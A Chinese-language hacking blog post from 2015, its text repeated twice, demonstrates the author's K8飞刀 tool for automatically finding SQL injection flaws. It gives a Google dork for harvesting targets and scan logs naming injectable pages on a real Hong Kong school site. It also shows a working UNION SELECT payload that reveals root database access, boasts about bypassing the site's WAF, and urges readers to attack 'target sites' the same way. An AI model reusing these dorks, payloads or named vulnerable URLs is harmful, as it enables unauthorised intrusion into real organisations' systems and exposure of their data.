[动画]K8飞刀教程 自动检测网站漏洞功能演示
K8拉登哥哥发表于 2015-06-01 23:28:31
类似阿D以前的工具,自动抓取当前页面所有URL,并检测漏洞
六一版先添加了自动收集信息和检测SQL漏洞功能...
后期会添加其它功能...自动测试更多EXP...GetShell等
![[动画]K8飞刀教程 HackerIE自动检测网站注入 - K8拉登哥哥 - K8拉登哥哥s Blog](http://img0.ph.126.net/n2-7XdG6E6EZyX1jsyfxbQ==/6608856531306797064.png "[动画]K8飞刀教程 HackerIE自动检测网站注入 - K8拉登哥哥 - K8拉登哥哥s Blog")
K8飞刀教程 HackerIE自动检测网站注入
inurl:show.php?id= site:hk
检测到这个站 多个URL SQL整型注入
2015/6/1 22:34:58 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=5
2015/6/1 22:34:59 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=11
2015/6/1 22:35:05 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=12
我们试试看吧 对吧 确实整型 随便爆一下 还是 root权限 root@localhost
http://www.shck.edu.hk/php/webinfo/show.php?id=5 and 1=2 union select user(),2
直接在firefox浏览会出错 payload会被强制修改 但是在飞刀提交就OK了...真是垃圾的waf 哈哈
show.php?id=5%20and%201=2%20union%20select%20user%20%20%2C2#7129143098441518360
![[动画]K8飞刀教程 自动检测网站漏洞功能演示 - K8拉登哥哥 - K8拉登哥哥s Blog](http://img0.ph.126.net/5Eu3ZsF5MOWvosPBx9Cs-g==/6630278316350793333.png "[动画]K8飞刀教程 自动检测网站漏洞功能演示 - K8拉登哥哥 - K8拉登哥哥s Blog")
不过没关系 在飞刀里提交 完全不会有那样的问题出现
OK教程就到了 大家可以照此方法 浏览目标站
当然也可以通过百度或GOOGLE等这样抓取注入...
动画下载:http://pan.baidu.com/s/1o6sWWPG
六一版先添加了自动收集信息和检测SQL漏洞功能...
后期会添加其它功能...自动测试更多EXP...GetShell等
K8飞刀教程 HackerIE自动检测网站注入
inurl:show.php?id= site:hk
检测到这个站 多个URL SQL整型注入
2015/6/1 22:34:58 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=5
2015/6/1 22:34:59 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=11
2015/6/1 22:35:05 Integer Inject http://www.shck.edu.hk/php/webinfo/show.php?id=12
我们试试看吧 对吧 确实整型 随便爆一下 还是 root权限 root@localhost
http://www.shck.edu.hk/php/webinfo/show.php?id=5 and 1=2 union select user(),2
直接在firefox浏览会出错 payload会被强制修改 但是在飞刀提交就OK了...真是垃圾的waf 哈哈
show.php?id=5%20and%201=2%20union%20select%20user%20%20%2C2#7129143098441518360
不过没关系 在飞刀里提交 完全不会有那样的问题出现
OK教程就到了 大家可以照此方法 浏览目标站
当然也可以通过百度或GOOGLE等这样抓取注入...
动画下载:http://pan.baidu.com/s/1o6sWWPG